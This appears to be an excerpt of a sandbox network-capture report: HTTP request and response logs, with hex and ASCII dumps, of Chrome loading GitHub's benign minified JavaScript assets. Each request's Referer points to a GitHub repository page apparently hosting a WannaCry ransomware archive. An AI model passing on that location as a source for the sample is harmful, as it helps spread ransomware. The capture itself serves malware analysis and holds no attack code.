                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15193
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 26 Jan 2024 14:37:34 GMT
                                                                                      ETag: 0x8DC1E7C55AB5C06
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 2589580
                                                                                      X-Served-By: cache-iad-kjyo7100082-IAD, cache-ewr18132-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 4747, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4482c413c975b2ad38f98231023d7ea353455e0f
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 36 38 38 39 37 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 6e 4a 3a 28 29 3d 3e 5f 7d 29 3b 76 61 72 20 73 2c 61 2c 72 2c 6e 2c 6f 2c 68 2c 6c 2c 75 2c 6d 2c 64 2c 63 2c 66 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 2c 73 2c 61 29 7b 69 66 28 22 6d 22 3d 3d 3d 73 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 50
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_relative-time-element_dist_index_js"],{68897:(t,e,i)=>{i.d(e,{nJ:()=>_});var s,a,r,n,o,h,l,u,m,d,c,f,g=function(t,e,i,s,a){if("m"===s)throw TypeError("P
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 79 6c 65 7c 7c 22 73 68 6f 72 74 22 29 3b 22 6c 6f 6e 67 22 21 3d 3d 69 26 26 22 73 68 6f 72 74 22 21 3d 3d 69 26 26 22 6e 61 72 72 6f 77 22 21 3d 3d 69 26 26 22 64 69 67 69 74 61 6c 22 21 3d 3d 69 26 26 28 69 3d 22 73 68 6f 72 74 22 29 3b 6c 65 74 20 61 3d 22 64 69 67 69 74 61 6c 22 3d 3d 3d 69 3f 22 6e 75 6d 65 72 69 63 22 3a 69 2c 72 3d 65 2e 68 6f 75 72 73 7c 7c 61 3b 61 3d 22 32 2d 64 69 67 69 74 22 3d 3d 3d 72 3f 22 6e 75 6d 65 72 69 63 22 3a 72 3b 6c 65 74 20 6e 3d 65 2e 6d 69 6e 75 74 65 73 7c 7c 61 3b 61 3d 22 32 2d 64 69 67 69 74 22 3d 3d 3d 6e 3f 22 6e 75 6d 65 72 69 63 22 3a 6e 3b 6c 65 74 20 6f 3d 65 2e 73 65 63 6f 6e 64 73 7c 7c 61 3b 61 3d 22 32 2d 64 69 67 69 74 22 3d 3d 3d 6f 3f 22 6e 75 6d 65 72 69 63 22 3a 6f 3b 6c 65 74 20 68 3d 65 2e
                                                                                      Data Ascii: yle||"short");"long"!==i&&"short"!==i&&"narrow"!==i&&"digital"!==i&&(i="short");let a="digital"===i?"numeric":i,r=e.hours||a;a="2-digit"===r?"numeric":r;let n=e.minutes||a;a="2-digit"===n?"numeric":n;let o=e.seconds||a;a="2-digit"===o?"numeric":o;let h=e.
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 3d 3d 61 3f 22 73 68 6f 72 74 22 3a 61 7d 29 2e 66 6f 72 6d 61 74 54 6f 50 61 72 74 73 28 65 29 7d 66 6f 72 6d 61 74 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 6f 72 6d 61 74 54 6f 50 61 72 74 73 28 74 29 2e 6d 61 70 28 74 3d 3e 74 2e 76 61 6c 75 65 29 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 73 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 76 3d 2f 5e 5b 2d 2b 5d 3f 50 28 3f 3a 28 5c 64 2b 29 59 29 3f 28 3f 3a 28 5c 64 2b 29 4d 29 3f 28 3f 3a 28 5c 64 2b 29 57 29 3f 28 3f 3a 28 5c 64 2b 29 44 29 3f 28 3f 3a 54 28 3f 3a 28 5c 64 2b 29 48 29 3f 28 3f 3a 28 5c 64 2b 29 4d 29 3f 28 3f 3a 28 5c 64 2b 29 53 29 3f 29 3f 24 2f 2c 4d 3d 5b 22 79 65 61 72 22 2c 22 6d 6f 6e 74 68 22 2c 22 77 65 65 6b 22 2c 22 64 61 79 22 2c 22 68 6f 75 72 22 2c 22 6d 69 6e
                                                                                      Data Ascii: ==a?"short":a}).formatToParts(e)}format(t){return this.formatToParts(t).map(t=>t.value).join("")}};s=new WeakMap;let v=/^[-+]?P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)W)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$/,M=["year","month","week","day","hour","min
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 72 69 6e 67 28 74 29 2e 74 72 69 6d 28 29 2c 73 3d 69 2e 73 74 61 72 74 73 57 69 74 68 28 22 2d 22 29 3f 2d 31 3a 31 2c 61 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 69 2e 6d 61 74 63 68 28 76 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 6c 69 63 65 28 31 29 2e 6d 61 70 28 74 3d 3e 28 4e 75 6d 62 65 72 28 74 29 7c 7c 30 29 2a 73 29 3b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 44 75 72 61 74 69 6f 6e 28 2e 2e 2e 61 29 3a 6e 65 77 20 44 75 72 61 74 69 6f 6e 7d 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 6c 65 74 7b 79 65 61 72 73 3a 65 2c 6d 6f 6e 74 68 73 3a 69 2c 77 65 65 6b 73 3a 73 2c 64 61 79 73 3a 61 2c 68 6f 75 72 73 3a 72 2c 6d 69 6e 75 74 65 73 3a 6e 2c 73 65 63 6f 6e 64 73 3a 6f 2c 6d 69 6c 6c 69 73 65
                                                                                      Data Ascii: tring(t).trim(),s=i.startsWith("-")?-1:1,a=null===(e=i.match(v))||void 0===e?void 0:e.slice(1).map(t=>(Number(t)||0)*s);return a?new Duration(...a):new Duration}if("object"==typeof t){let{years:e,months:i,weeks:s,days:a,hours:r,minutes:n,seconds:o,millise
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 67 65 74 44 61 74 65 28 29 3b 69 66 28 6e 3e 3d 32 37 7c 7c 73 2b 61 2b 6e 29 7b 6c 65 74 20 74 3d 6e 65 77 20 44 61 74 65 28 65 29 3b 74 2e 73 65 74 46 75 6c 6c 59 65 61 72 28 6d 2b 73 2a 69 29 2c 74 2e 73 65 74 4d 6f 6e 74 68 28 64 2b 61 2a 69 29 2c 74 2e 73 65 74 44 61 74 65 28 63 2b 6e 2a 69 29 3b 6c 65 74 20 6f 3d 74 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2d 65 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 68 3d 74 2e 67 65 74 4d 6f 6e 74 68 28 29 2d 65 2e 67 65 74 4d 6f 6e 74 68 28 29 2c 6c 3d 4d 61 74 68 2e 61 62 73 28 4d 61 74 68 2e 72 6f 75 6e 64 28 28 4e 75 6d 62 65 72 28 74 29 2d 4e 75 6d 62 65 72 28 65 29 29 2f 38 36 34 65 35 29 29 2c 75 3d 4d 61 74 68 2e 61 62 73 28 31 32 2a 6f 2b 68 29 3b 6c 3c 32 37 3f 28 6e 3e 3d 36 3f 28 72 2b 3d 4d 61
                                                                                      Data Ascii: getDate();if(n>=27||s+a+n){let t=new Date(e);t.setFullYear(m+s*i),t.setMonth(d+a*i),t.setDate(c+n*i);let o=t.getFullYear()-e.getFullYear(),h=t.getMonth()-e.getMonth(),l=Math.abs(Math.round((Number(t)-Number(e))/864e5)),u=Math.abs(12*o+h);l<27?(n>=6?(r+=Ma
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 77 54 65 78 74 3d 65 2c 74 68 69 73 2e 6f 6c 64 54 69 74 6c 65 3d 69 2c 74 68 69 73 2e 6e 65 77 54 69 74 6c 65 3d 73 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 43 28 74 29 7b 69 66 28 21 74 2e 64 61 74 65 29 72 65 74 75 72 6e 20 31 2f 30 3b 69 66 28 22 64 75 72 61 74 69 6f 6e 22 3d 3d 3d 74 2e 66 6f 72 6d 61 74 7c 7c 22 65 6c 61 70 73 65 64 22 3d 3d 3d 74 2e 66 6f 72 6d 61 74 29 7b 6c 65 74 20 65 3d 74 2e 70 72 65 63 69 73 69 6f 6e 3b 69 66 28 22 73 65 63 6f 6e 64 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 31 65 33 3b 69 66 28 22 6d 69 6e 75 74 65 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 36 65 34 7d 6c 65 74 20 65 3d 4d 61 74 68 2e 61 62 73 28 44 61 74 65 2e 6e 6f 77 28 29 2d 74 2e 64 61 74 65 2e 67 65 74 54 69 6d 65 28 29 29 3b 72 65 74 75 72 6e 20 65 3c 36 65 34 3f
                                                                                      Data Ascii: wText=e,this.oldTitle=i,this.newTitle=s}};function C(t){if(!t.date)return 1/0;if("duration"===t.format||"elapsed"===t.format){let e=t.precision;if("second"===e)return 1e3;if("minute"===e)return 6e4}let e=Math.abs(Date.now()-t.date.getTime());return e<6e4?
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 65 22 2c 22 70 72 65 63 69 73 69 6f 6e 22 2c 22 66 6f 72 6d 61 74 22 2c 22 66 6f 72 6d 61 74 2d 73 74 79 6c 65 22 2c 22 64 61 74 65 74 69 6d 65 22 2c 22 6c 61 6e 67 22 2c 22 74 69 74 6c 65 22 5d 7d 67 65 74 20 6f 6e 52 65 6c 61 74 69 76 65 54 69 6d 65 55 70 64 61 74 65 64 28 29 7b 72 65 74 75 72 6e 20 41 28 74 68 69 73 2c 66 2c 22 66 22 29 7d 73 65 74 20 6f 6e 52 65 6c 61 74 69 76 65 54 69 6d 65 55 70 64 61 74 65 64 28 74 29 7b 41 28 74 68 69 73 2c 66 2c 22 66 22 29 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 75 70 64 61 74 65 64 22 2c 41 28 74 68 69 73 2c 66 2c 22 66 22 29 29 2c 45 28 74 68 69 73 2c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 22 66 75
                                                                                      Data Ascii: e","precision","format","format-style","datetime","lang","title"]}get onRelativeTimeUpdated(){return A(this,f,"f")}set onRelativeTimeUpdated(t){A(this,f,"f")&&this.removeEventListener("relative-time-updated",A(this,f,"f")),E(this,f,"object"==typeof t||"fu
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 28 29 7b 76 61 72 20 74 3b 6c 65 74 20 65 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 79 65 61 72 22 29 3b 72 65 74 75 72 6e 22 6e 75 6d 65 72 69 63 22 3d 3d 3d 65 7c 7c 22 32 2d 64 69 67 69 74 22 3d 3d 3d 65 3f 65 3a 74 68 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 79 65 61 72 22 29 7c 7c 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 55 54 43 46 75 6c 6c 59 65 61 72 28 29 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 64 61 74 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 67 65 74 55 54 43 46 75 6c 6c 59 65 61 72 28 29 29 3f 76 6f 69 64 20 30 3a 22 6e 75 6d 65 72 69 63 22 7d 73 65 74 20 79 65 61 72 28 74 29 7b 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 65 61 72 22 2c 74 7c 7c 22
                                                                                      Data Ascii: r(){var t;let e=this.getAttribute("year");return"numeric"===e||"2-digit"===e?e:this.hasAttribute("year")||new Date().getUTCFullYear()===(null===(t=this.date)||void 0===t?void 0:t.getUTCFullYear())?void 0:"numeric"}set year(t){this.setAttribute("year",t||"
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 29 72 65 74 75 72 6e 22 6c 6f 6e 67 22 3b 69 66 28 22 73 68 6f 72 74 22 3d 3d 3d 74 29 72 65 74 75 72 6e 22 73 68 6f 72 74 22 3b 69 66 28 22 6e 61 72 72 6f 77 22 3d 3d 3d 74 29 72 65 74 75 72 6e 22 6e 61 72 72 6f 77 22 3b 6c 65 74 20 65 3d 74 68 69 73 2e 66 6f 72 6d 61 74 3b 72 65 74 75 72 6e 22 65 6c 61 70 73 65 64 22 3d 3d 3d 65 7c 7c 22 6d 69 63 72 6f 22 3d 3d 3d 65 3f 22 6e 61 72 72 6f 77 22 3a 22 64 61 74 65 74 69 6d 65 22 3d 3d 3d 65 3f 22 73 68 6f 72 74 22 3a 22 6c 6f 6e 67 22 7d 73 65 74 20 66 6f 72 6d 61 74 53 74 79 6c 65 28 74 29 7b 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 6f 72 6d 61 74 2d 73 74 79 6c 65 22 2c 74 29 7d 67 65 74 20 64 61 74 65 74 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 41 74 74 72 69
                                                                                      Data Ascii: t)return"long";if("short"===t)return"short";if("narrow"===t)return"narrow";let e=this.format;return"elapsed"===e||"micro"===e?"narrow":"datetime"===e?"short":"long"}set formatStyle(t){this.setAttribute("format-style",t)}get datetime(){return this.getAttri
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6d 2a 61 3a 30 2c 64 3e 3d 31 3f 28 75 2d 31 32 2a 6d 29 2a 61 3a 30 2c 30 2c 64 3e 3d 33 3f 28 6c 2d 33 30 2a 75 29 2a 61 3a 30 2c 64 3e 3d 34 3f 28 68 2d 32 34 2a 6c 29 2a 61 3a 30 2c 64 3e 3d 35 3f 28 6f 2d 36 30 2a 68 29 2a 61 3a 30 2c 64 3e 3d 36 3f 28 6e 2d 36 30 2a 6f 29 2a 61 3a 30 2c 64 3e 3d 37 3f 28 72 2d 31 65 33 2a 6e 29 2a 61 3a 30 29 7d 28 73 2c 74 68 69 73 2e 70 72 65 63 69 73 69 6f 6e 2c 6f 29 2c 67 3d 41 28 74 68 69 73 2c 61 2c 22 6d 22 2c 75 29 2e 63 61 6c 6c 28 74 68 69 73 2c 66 29 2c 79 3d 74 3b 28 79 3d 22 64 75 72 61 74 69 6f 6e 22 3d 3d 3d 67 3f 41 28 74 68 69 73 2c 61 2c 22 6d 22 2c 6d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 66 29 3a 22 72 65 6c 61 74 69 76 65 22 3d 3d 3d 67 3f 41 28 74 68 69 73 2c 61 2c 22 6d 22 2c 64 29 2e 63 61 6c
                                                                                      Data Ascii: m*a:0,d>=1?(u-12*m)*a:0,0,d>=3?(l-30*u)*a:0,d>=4?(h-24*l)*a:0,d>=5?(o-60*h)*a:0,d>=6?(n-60*o)*a:0,d>=7?(r-1e3*n)*a:0)}(s,this.precision,o),g=A(this,a,"m",u).call(this,f),y=t;(y="duration"===g?A(this,a,"m",m).call(this,f):"relative"===g?A(this,a,"m",d).cal


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.1649723185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC736OUTGET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 18862
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 26 Feb 2024 19:17:29 GMT
                                                                                      ETag: 0x8DC36FF9311C578
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 1293685
                                                                                      X-Served-By: cache-iad-kcgs7200020-IAD, cache-lga21940-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4a648a960fef4982b791bddffe432c94feac5d2a
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 22 5d 2c 7b 31 30 31 36 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 43 6f 6d 62 6f 62 6f 78 7d 29 3b 6c 65 74 20 43 6f 6d 62 6f 62 6f 78 3d 63 6c 61 73 73 20 43 6f 6d 62 6f 62 6f 78 7b 63 6f 6e 73 74 72 75 63
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0"],{10160:(e,t,n)=>{n.d(t,{Z:()=>Combobox});let Combobox=class Combobox{construc
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 74 22 3d 3d 3d 65 2e 74 79 70 65 3b 6c 65 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 69 6e 70 75 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 29 7c 7c 22 22 29 3b 6e 26 26 74 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 28 29 7d 29 28 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6e 70 75 74 48 61 6e 64 6c 65 72 3d 74 68 69 73 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 2e 62 69 6e 64 28 74 68 69 73 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c 22 63 6f 6d 62 6f 62 6f 78 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 74 2e 69 64 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61
                                                                                      Data Ascii: rt"===e.type;let n=document.getElementById(t.input.getAttribute("aria-controls")||"");n&&t.clearSelection()})(e,this),this.inputHandler=this.clearSelection.bind(this),e.setAttribute("role","combobox"),e.setAttribute("aria-controls",t.id),e.setAttribute("a
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 69 73 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 69 29 7d 69 6e 64 69 63 61 74 65 44 65 66 61 75 6c 74 4f 70 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 22 61 63 74 69 76 65 22 3d 3d 3d 74 68 69 73 2e 66 69 72 73 74 4f 70 74 69 6f 6e 53 65 6c 65 63 74 69 6f 6e 4d 6f 64 65 3f 6e 75 6c 6c 3d 3d 3d 28 65 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 5d 3a 6e 6f 74 28 5b 61 72 69 61 2d 64 69 73 61 62 6c 65 64 3d 22 74 72 75 65 22 5d 29 27 29 29 2e 66 69 6c 74 65 72 28 72 29 5b 30 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6f 6d 62 6f
                                                                                      Data Ascii: ist.removeEventListener("click",i)}indicateDefaultOption(){var e;"active"===this.firstOptionSelectionMode?null===(e=Array.from(this.list.querySelectorAll('[role="option"]:not([aria-disabled="true"])')).filter(r)[0])||void 0===e||e.setAttribute("data-combo
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 27 5b 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 5d 27 29 3b 74 26 26 22 74 72 75 65 22 21 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 29 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6d 6d 69 74 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 74 7d 29 29 7d 28 74 2c 7b 65 76 65 6e 74 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74
                                                                                      Data Ascii: get instanceof Element))return;let t=e.target.closest('[role="option"]');t&&"true"!==t.getAttribute("aria-disabled")&&function(e,t){e.dispatchEvent(new CustomEvent("combobox-commit",{bubbles:!0,detail:t}))}(t,{event:e})}function o(e,t){let n=t.querySelect
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 3a 7b 70 72 65 66 69 78 3a 22 23 23 23 20 22 7d 2c 22 68 65 61 64 65 72 2d 34 22 3a 7b 70 72 65 66 69 78 3a 22 23 23 23 23 20 22 7d 2c 22 68 65 61 64 65 72 2d 35 22 3a 7b 70 72 65 66 69 78 3a 22 23 23 23 23 23 20 22 7d 2c 22 68 65 61 64 65 72 2d 36 22 3a 7b 70 72 65 66 69 78 3a 22 23 23 23 23 23 23 20 22 7d 2c 62 6f 6c 64 3a 7b 70 72 65 66 69 78 3a 22 2a 2a 22 2c 73 75 66 66 69 78 3a 22 2a 2a 22 2c 74 72 69 6d 46 69 72 73 74 3a 21 30 7d 2c 69 74 61 6c 69 63 3a 7b 70 72 65 66 69 78 3a 22 5f 22 2c 73 75 66 66 69 78 3a 22 5f 22 2c 74 72 69 6d 46 69 72 73 74 3a 21 30 7d 2c 71 75 6f 74 65 3a 7b 70 72 65 66 69 78 3a 22 3e 20 22 2c 6d 75 6c 74 69 6c 69 6e 65 3a 21 30 2c 73 75 72 72 6f 75 6e 64 57 69 74 68 4e 65 77 6c 69 6e 65 73 3a 21 30 7d 2c 63 6f 64 65 3a
                                                                                      Data Ascii: ":{prefix:"### "},"header-4":{prefix:"#### "},"header-5":{prefix:"##### "},"header-6":{prefix:"###### "},bold:{prefix:"**",suffix:"**",trimFirst:!0},italic:{prefix:"_",suffix:"_",trimFirst:!0},quote:{prefix:"> ",multiline:!0,surroundWithNewlines:!0},code:
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 29 7b 72 65 74 75 72 6e 5b 22 6c 65 76 65 6c 22 5d 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 2c 6e 29 7b 69 66 28 22 6c 65 76 65 6c 22 21 3d 3d 65 29 72 65 74 75 72 6e 3b 6c 65 74 20 6c 3d 70 61 72 73 65 49 6e 74 28 6e 7c 7c 22 33 22 2c 31 30 29 3b 72 28 74 68 69 73 2c 69 2c 22 6d 22 2c 6f 29 2e 63 61 6c 6c 28 74 68 69 73 2c 6c 29 7d 7d 3b 69 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3c 31 7c 7c 65 3e 36 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 60 24 7b 22 23 22 2e 72 65 70 65 61 74 28 65 29 7d 20 60 3b 64 2e 73 65 74 28 74 68 69 73 2c 7b 70 72 65 66 69 78 3a 74 7d 29 7d 2c 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d
                                                                                      Data Ascii: ervedAttributes(){return["level"]}attributeChangedCallback(e,t,n){if("level"!==e)return;let l=parseInt(n||"3",10);r(this,i,"m",o).call(this,l)}};i=new WeakSet,o=function(e){if(e<1||e>6)return;let t=`${"#".repeat(e)} `;d.set(this,{prefix:t})},window.custom
